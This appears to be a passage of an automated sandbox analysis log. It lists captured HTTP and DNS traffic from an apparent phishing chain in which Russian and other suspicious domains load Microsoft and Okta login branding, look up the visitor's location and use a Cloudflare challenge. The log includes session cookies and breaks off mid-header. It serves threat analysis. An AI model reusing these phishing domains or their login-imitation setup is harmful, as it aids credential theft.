XSRF-TOKEN=eyJpdiI6IklHQU9jeERjOEpPTStWV1dTL2ZlbHc9PSIsInZhbHVlIjoiNktDVW9pUjdMdkdXekhDeC9EVVU4QkMzMm00Q2dhRVlhbGI4V3E3eGtUN3NQYkcwcnVlU2YrWDVFOEtNNFBXZDJaTTVHZTBHdmlMTTZ2amhaRisxbWF2RFc2bEtzR1lTTzZlMzRlQmk4NWhkSUxPYUluTmg5RloveTVnSzdyL2IiLCJtYWMiOiJiYjZhMDkzMzU4YWNkNGUwZmFmMTMyMDU5ODk2ZTExYTY2ODVlNzRiODM0ZmMwMDI1N2QwYjc5ZmFhYzA2Y2IxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZ3MDF0cEowcDdwWXFvY2JjQTNKNVE9PSIsInZhbHVlIjoiV3lZQjcxU1J1SkIwWW83UmwzaUkyQXZYMUlkdS9Zb2llZUFQNmIxSDE5VnRzQXFITVdrajlONWM0TXh3MTM0WmhQeWVMMFA0OUJXaTA2WjBqUDFYUG1IUVBYandmbFR4Y2hiUTlZM09RSFVvWjVTd3Vhak8yb3E1UUFVcjJOMkwiLCJtYWMiOiIzMzA5MGI4MjZiMTNkZmU5NGRiOGQ4MGM5MjBlZWVlZWNkNTJhOGNhMzY2OTkwYjQzYjAzZDhlN2U3Mzg1NzJmIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /qrfHxgKeu2tKuiSgwCl7JHA1idmBstY7isSXi9ATYZG8x5nbjgUKksWMa1h72yDxQLaef240 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklHQU9jeERjOEpPTStWV1dTL2ZlbHc9PSIsInZhbHVlIjoiNktDVW9pUjdMdkdXekhDeC9EVVU4QkMzMm00Q2dhRVlhbGI4V3E3eGtUN3NQYkcwcnVlU2YrWDVFOEtNNFBXZDJaTTVHZTBHdmlMTTZ2amhaRisxbWF2RFc2bEtzR1lTTzZlMzRlQmk4NWhkSUxPYUluTmg5RloveTVnSzdyL2IiLCJtYWMiOiJiYjZhMDkzMzU4YWNkNGUwZmFmMTMyMDU5ODk2ZTExYTY2ODVlNzRiODM0ZmMwMDI1N2QwYjc5ZmFhYzA2Y2IxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZ3MDF0cEowcDdwWXFvY2JjQTNKNVE9PSIsInZhbHVlIjoiV3lZQjcxU1J1SkIwWW83UmwzaUkyQXZYMUlkdS9Zb2llZUFQNmIxSDE5VnRzQXFITVdrajlONWM0TXh3MTM0WmhQeWVMMFA0OUJXaTA2WjBqUDFYUG1IUVBYandmbFR4Y2hiUTlZM09RSFVvWjVTd3Vhak8yb3E1UUFVcjJOMkwiLCJtYWMiOiIzMzA5MGI4MjZiMTNkZmU5NGRiOGQ4MGM5MjBlZWVlZWNkNTJhOGNhMzY2OTkwYjQzYjAzZDhlN2U3Mzg1NzJmIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /uvVMx7KVI7aqSsO73T4YmMDJiwpgOXnjl0kvOhd3fZApMRdu3RNd67MlVtw7oEWHHR2t8JGp85UDgXLK6y78v3sztJef260 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ldaqmiesa.fictiougbo.ru/gsxqesvuwwcuticdlrkzzfjoefdgh8hc19x16gw?NNRPYSZWDSZPCOGKLGTOXMOLIFOGQAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklHQU9jeERjOEpPTStWV1dTL2ZlbHc9PSIsInZhbHVlIjoiNktDVW9pUjdMdkdXekhDeC9EVVU4QkMzMm00Q2dhRVlhbGI4V3E3eGtUN3NQYkcwcnVlU2YrWDVFOEtNNFBXZDJaTTVHZTBHdmlMTTZ2amhaRisxbWF2RFc2bEtzR1lTTzZlMzRlQmk4NWhkSUxPYUluTmg5RloveTVnSzdyL2IiLCJtYWMiOiJiYjZhMDkzMzU4YWNkNGUwZmFmMTMyMDU5ODk2ZTExYTY2ODVlNzRiODM0ZmMwMDI1N2QwYjc5ZmFhYzA2Y2IxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZ3MDF0cEowcDdwWXFvY2JjQTNKNVE9PSIsInZhbHVlIjoiV3lZQjcxU1J1SkIwWW83UmwzaUkyQXZYMUlkdS9Zb2llZUFQNmIxSDE5VnRzQXFITVdrajlONWM0TXh3MTM0WmhQeWVMMFA0OUJXaTA2WjBqUDFYUG1IUVBYandmbFR4Y2hiUTlZM09RSFVvWjVTd3Vhak8yb3E1UUFVcjJOMkwiLCJtYWMiOiIzMzA5MGI4MjZiMTNkZmU5NGRiOGQ4MGM5MjBlZWVlZWNkNTJhOGNhMzY2OTkwYjQzYjAzZDhlN2U3Mzg1NzJmIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /mn4fJ2HLn9Uw3VPFMSNDf0KbvFvrkDMNBQbij1JmwKhaOhuNTlOHiBbeg8Y78147 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklHQU9jeERjOEpPTStWV1dTL2ZlbHc9PSIsInZhbHVlIjoiNktDVW9pUjdMdkdXekhDeC9EVVU4QkMzMm00Q2dhRVlhbGI4V3E3eGtUN3NQYkcwcnVlU2YrWDVFOEtNNFBXZDJaTTVHZTBHdmlMTTZ2amhaRisxbWF2RFc2bEtzR1lTTzZlMzRlQmk4NWhkSUxPYUluTmg5RloveTVnSzdyL2IiLCJtYWMiOiJiYjZhMDkzMzU4YWNkNGUwZmFmMTMyMDU5ODk2ZTExYTY2ODVlNzRiODM0ZmMwMDI1N2QwYjc5ZmFhYzA2Y2IxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZ3MDF0cEowcDdwWXFvY2JjQTNKNVE9PSIsInZhbHVlIjoiV3lZQjcxU1J1SkIwWW83UmwzaUkyQXZYMUlkdS9Zb2llZUFQNmIxSDE5VnRzQXFITVdrajlONWM0TXh3MTM0WmhQeWVMMFA0OUJXaTA2WjBqUDFYUG1IUVBYandmbFR4Y2hiUTlZM09RSFVvWjVTd3Vhak8yb3E1UUFVcjJOMkwiLCJtYWMiOiIzMzA5MGI4MjZiMTNkZmU5NGRiOGQ4MGM5MjBlZWVlZWNkNTJhOGNhMzY2OTkwYjQzYjAzZDhlN2U3Mzg1NzJmIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /yzgiJjBin2JwCe25de92rsEYISnLKKsSibuk7vo90174 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklHQU9jeERjOEpPTStWV1dTL2ZlbHc9PSIsInZhbHVlIjoiNktDVW9pUjdMdkdXekhDeC9EVVU4QkMzMm00Q2dhRVlhbGI4V3E3eGtUN3NQYkcwcnVlU2YrWDVFOEtNNFBXZDJaTTVHZTBHdmlMTTZ2amhaRisxbWF2RFc2bEtzR1lTTzZlMzRlQmk4NWhkSUxPYUluTmg5RloveTVnSzdyL2IiLCJtYWMiOiJiYjZhMDkzMzU4YWNkNGUwZmFmMTMyMDU5ODk2ZTExYTY2ODVlNzRiODM0ZmMwMDI1N2QwYjc5ZmFhYzA2Y2IxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZ3MDF0cEowcDdwWXFvY2JjQTNKNVE9PSIsInZhbHVlIjoiV3lZQjcxU1J1SkIwWW83UmwzaUkyQXZYMUlkdS9Zb2llZUFQNmIxSDE5VnRzQXFITVdrajlONWM0TXh3MTM0WmhQeWVMMFA0OUJXaTA2WjBqUDFYUG1IUVBYandmbFR4Y2hiUTlZM09RSFVvWjVTd3Vhak8yb3E1UUFVcjJOMkwiLCJtYWMiOiIzMzA5MGI4MjZiMTNkZmU5NGRiOGQ4MGM5MjBlZWVlZWNkNTJhOGNhMzY2OTkwYjQzYjAzZDhlN2U3Mzg1NzJmIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /optp7gQK5lVR4zdBP02eR21a0IaWJZ3htroKGmT7ughSgaEmy3tAcDRKML6Qep8rCef200 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklHQU9jeERjOEpPTStWV1dTL2ZlbHc9PSIsInZhbHVlIjoiNktDVW9pUjdMdkdXekhDeC9EVVU4QkMzMm00Q2dhRVlhbGI4V3E3eGtUN3NQYkcwcnVlU2YrWDVFOEtNNFBXZDJaTTVHZTBHdmlMTTZ2amhaRisxbWF2RFc2bEtzR1lTTzZlMzRlQmk4NWhkSUxPYUluTmg5RloveTVnSzdyL2IiLCJtYWMiOiJiYjZhMDkzMzU4YWNkNGUwZmFmMTMyMDU5ODk2ZTExYTY2ODVlNzRiODM0ZmMwMDI1N2QwYjc5ZmFhYzA2Y2IxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZ3MDF0cEowcDdwWXFvY2JjQTNKNVE9PSIsInZhbHVlIjoiV3lZQjcxU1J1SkIwWW83UmwzaUkyQXZYMUlkdS9Zb2llZUFQNmIxSDE5VnRzQXFITVdrajlONWM0TXh3MTM0WmhQeWVMMFA0OUJXaTA2WjBqUDFYUG1IUVBYandmbFR4Y2hiUTlZM09RSFVvWjVTd3Vhak8yb3E1UUFVcjJOMkwiLCJtYWMiOiIzMzA5MGI4MjZiMTNkZmU5NGRiOGQ4MGM5MjBlZWVlZWNkNTJhOGNhMzY2OTkwYjQzYjAzZDhlN2U3Mzg1NzJmIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /qrfHxgKeu2tKuiSgwCl7JHA1idmBstY7isSXi9ATYZG8x5nbjgUKksWMa1h72yDxQLaef240 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklHQU9jeERjOEpPTStWV1dTL2ZlbHc9PSIsInZhbHVlIjoiNktDVW9pUjdMdkdXekhDeC9EVVU4QkMzMm00Q2dhRVlhbGI4V3E3eGtUN3NQYkcwcnVlU2YrWDVFOEtNNFBXZDJaTTVHZTBHdmlMTTZ2amhaRisxbWF2RFc2bEtzR1lTTzZlMzRlQmk4NWhkSUxPYUluTmg5RloveTVnSzdyL2IiLCJtYWMiOiJiYjZhMDkzMzU4YWNkNGUwZmFmMTMyMDU5ODk2ZTExYTY2ODVlNzRiODM0ZmMwMDI1N2QwYjc5ZmFhYzA2Y2IxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZ3MDF0cEowcDdwWXFvY2JjQTNKNVE9PSIsInZhbHVlIjoiV3lZQjcxU1J1SkIwWW83UmwzaUkyQXZYMUlkdS9Zb2llZUFQNmIxSDE5VnRzQXFITVdrajlONWM0TXh3MTM0WmhQeWVMMFA0OUJXaTA2WjBqUDFYUG1IUVBYandmbFR4Y2hiUTlZM09RSFVvWjVTd3Vhak8yb3E1UUFVcjJOMkwiLCJtYWMiOiIzMzA5MGI4MjZiMTNkZmU5NGRiOGQ4MGM5MjBlZWVlZWNkNTJhOGNhMzY2OTkwYjQzYjAzZDhlN2U3Mzg1NzJmIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijgQ0CVymhNkpYAfOoHIbpxyN6zyB2A8J0jKAEoibCiGg12203 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklHQU9jeERjOEpPTStWV1dTL2ZlbHc9PSIsInZhbHVlIjoiNktDVW9pUjdMdkdXekhDeC9EVVU4QkMzMm00Q2dhRVlhbGI4V3E3eGtUN3NQYkcwcnVlU2YrWDVFOEtNNFBXZDJaTTVHZTBHdmlMTTZ2amhaRisxbWF2RFc2bEtzR1lTTzZlMzRlQmk4NWhkSUxPYUluTmg5RloveTVnSzdyL2IiLCJtYWMiOiJiYjZhMDkzMzU4YWNkNGUwZmFmMTMyMDU5ODk2ZTExYTY2ODVlNzRiODM0ZmMwMDI1N2QwYjc5ZmFhYzA2Y2IxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZ3MDF0cEowcDdwWXFvY2JjQTNKNVE9PSIsInZhbHVlIjoiV3lZQjcxU1J1SkIwWW83UmwzaUkyQXZYMUlkdS9Zb2llZUFQNmIxSDE5VnRzQXFITVdrajlONWM0TXh3MTM0WmhQeWVMMFA0OUJXaTA2WjBqUDFYUG1IUVBYandmbFR4Y2hiUTlZM09RSFVvWjVTd3Vhak8yb3E1UUFVcjJOMkwiLCJtYWMiOiIzMzA5MGI4MjZiMTNkZmU5NGRiOGQ4MGM5MjBlZWVlZWNkNTJhOGNhMzY2OTkwYjQzYjAzZDhlN2U3Mzg1NzJmIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://ldaqmiesa.fictiougbo.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ldaqmiesa.fictiougbo.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /uvVMx7KVI7aqSsO73T4YmMDJiwpgOXnjl0kvOhd3fZApMRdu3RNd67MlVtw7oEWHHR2t8JGp85UDgXLK6y78v3sztJef260 HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklHQU9jeERjOEpPTStWV1dTL2ZlbHc9PSIsInZhbHVlIjoiNktDVW9pUjdMdkdXekhDeC9EVVU4QkMzMm00Q2dhRVlhbGI4V3E3eGtUN3NQYkcwcnVlU2YrWDVFOEtNNFBXZDJaTTVHZTBHdmlMTTZ2amhaRisxbWF2RFc2bEtzR1lTTzZlMzRlQmk4NWhkSUxPYUluTmg5RloveTVnSzdyL2IiLCJtYWMiOiJiYjZhMDkzMzU4YWNkNGUwZmFmMTMyMDU5ODk2ZTExYTY2ODVlNzRiODM0ZmMwMDI1N2QwYjc5ZmFhYzA2Y2IxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZ3MDF0cEowcDdwWXFvY2JjQTNKNVE9PSIsInZhbHVlIjoiV3lZQjcxU1J1SkIwWW83UmwzaUkyQXZYMUlkdS9Zb2llZUFQNmIxSDE5VnRzQXFITVdrajlONWM0TXh3MTM0WmhQeWVMMFA0OUJXaTA2WjBqUDFYUG1IUVBYandmbFR4Y2hiUTlZM09RSFVvWjVTd3Vhak8yb3E1UUFVcjJOMkwiLCJtYWMiOiIzMzA5MGI4MjZiMTNkZmU5NGRiOGQ4MGM5MjBlZWVlZWNkNTJhOGNhMzY2OTkwYjQzYjAzZDhlN2U3Mzg1NzJmIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /dbd5a2dd-7rcrp6rcww4gzy3cn17cmdrndlrjmelbvyaiv3tykbw/logintenantbranding/0/illustration?ts=637867048957779100 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://ldaqmiesa.fictiougbo.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /9755142544112559254pmWjlgMPIPOHLKQMPERUYBLRMFPHVKOAKArsCK9a19lgcCMiZsFyzhWwx39 HTTP/1.1Host: ei6xyg0kaqko0de4ypc5sjxcudao7jhmepyack459jabza1wouz.felixxw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /dbd5a2dd-7rcrp6rcww4gzy3cn17cmdrndlrjmelbvyaiv3tykbw/logintenantbranding/0/bannerlogo?ts=637867048968868505 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://ldaqmiesa.fictiougbo.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /dbd5a2dd-7rcrp6rcww4gzy3cn17cmdrndlrjmelbvyaiv3tykbw/logintenantbranding/0/bannerlogo?ts=637867048968868505 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /dbd5a2dd-7rcrp6rcww4gzy3cn17cmdrndlrjmelbvyaiv3tykbw/logintenantbranding/0/illustration?ts=637867048957779100 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /lbbzFU9cG7n956YbztDc1aduPhkbdvMLKCBqlIVYQkaAGLd0t HTTP/1.1Host: ldaqmiesa.fictiougbo.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InJDbzE3TjRnb3o0bHJaYXJVQ1psSVE9PSIsInZhbHVlIjoiY2ZSd2JNaWpkWWVsSHZKdXo0Ym41Snc4cWlSZUNRMkV2dkZuUnI5UEZCVDNIeVVDMENLYnZ0Lzc4dURrV25lUDBkZExXK3NkR2NaQmQyQU1mYnJaOWMzTmE0dXk3NkliK3R0S1ZIYlJMYXlWeUluVW1nWExEOEp4cThLdnNhVXQiLCJtYWMiOiJlZDc0NTZmMTM2MDI0MTEyZDRmOGE3MTAyZTJiNWVhZjRmN2Y4N2RmZGJjM2JjZDc3MmY4OTZmZTczYTkyNmJlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlAxeHJZRmR6RnRtdjVJSEVpamdTK0E9PSIsInZhbHVlIjoiNVhnYTZ1a3c2NHgxN0NNN2RiT2RZY3JTSDJMYkp5NFBreDZYZHYwRXZwSU9JTmJTR0hIZlZFeWU3QnBZUnUrRWNScEpSNURDSjREVUVJTjc1VVh5TFJZT294QWRVUndKQ1R2ak92bzFGT2pLMzRMeWhXeFlOckx3Z1h3TXBic3ciLCJtYWMiOiJhM2EyOTI1N2JhZWYzYzY2YThjNjNhNWY5MDkxZjk0YmUxNTkxYWFlNDM5YzUyYWJhODBjY2Q5YmJlNDk0ZjdiIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /9755142544112559254pmWjlgMPIPOHLKQMPERUYBLRMFPHVKOAKAyz78uKAG5n56zIKS8Sop47 HTTP/1.1Host: ei6xyg0kaqko0de4ypc5sjxcudao7jhmepyack459jabza1wouz.felixxw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficDNS traffic detected: DNS query: ossin7fot.pelosfilhos.com.br
              Source: global trafficDNS traffic detected: DNS query: docusecureonlineauthenticate.skapparelbd.com
              Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: i.ibb.co
              Source: global trafficDNS traffic detected: DNS query: upload.wikimedia.org
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: ldaqmiesa.fictiougbo.ru
              Source: global trafficDNS traffic detected: DNS query: code.jquery.com
              Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: xzes.kdyukk.ru
              Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: github.com
              Source: global trafficDNS traffic detected: DNS query: ok4static.oktacdn.com
              Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
              Source: global trafficDNS traffic detected: DNS query: get.geojs.io
              Source: global trafficDNS traffic detected: DNS query: ei6xyg0kaqko0de4ypc5sjxcudao7jhmepyack459jabza1wouz.felixxw.es
              Source: global trafficDNS traffic detected: DNS query: aadcdn.msauthimages.net
              Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/865828961:1742920071:wsJzvxjBvnrTFNhFz4QcQWpLr23PjLoMwj1Z-LfI0n0/92602f271f80d96d/sd_h3PU4XBKOakP2gpVeyHPPiCVIwPT.IhX8USOHHVE-1742924330-1.1.1.1-a9tHj0RWV46cor58YN5ZBLC9MxI.9r6GAEoaVVG0mgtgDy.IDbfkgsjik1q7WZBS HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3687sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: text/plain;charset=UTF-8cf-chl: sd_h3PU4XBKOakP2gpVeyHPPiCVIwPT.IhX8USOHHVE-1742924330-1.1.1.1-a9tHj0RWV46cor58YN5ZBLC9MxI.9r6GAEoaVVG0mgtgDy.IDbfkgsjik1q7WZBScf-chl-ra: 0sec-ch-ua-mobile: ?0Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/7qi3r/0x4AAAAAAA_djh0yNsYo2DnW/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Mar 2025 17:38:51 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Fri, 30 Sep 2022 11:49:49 GMTAccept-Ranges: bytesContent-Length: 11816Vary: Accept-EncodingContent-Type: text/html
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Mar 2025 17:39:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y3bhx9oRu5xqaAbxpBQcKm45sFqrfDhTnXolLqor50mGAT5tqx0lmfZj8ccOfmv2xWBW%2F8AS1aRs6HXgsYg%2B3fzbfI7GRBrr9wGfSn3wv0uK6QTquoN5NWLibngd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=40326&min_rtt=40323&rtt_var=15128&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2285&delivery_rate=70580&cwnd=252&unsent_bytes=0&cid=6f81be20a64f46c5&ts=396&x=0"Cache-Control: max-age=14400CF-Cache-Status: MISSServer: cloudflareCF-RAY: 92602fa73a580fa5-EWRalt-svc: h3=":443"; ma=86400server-timing: 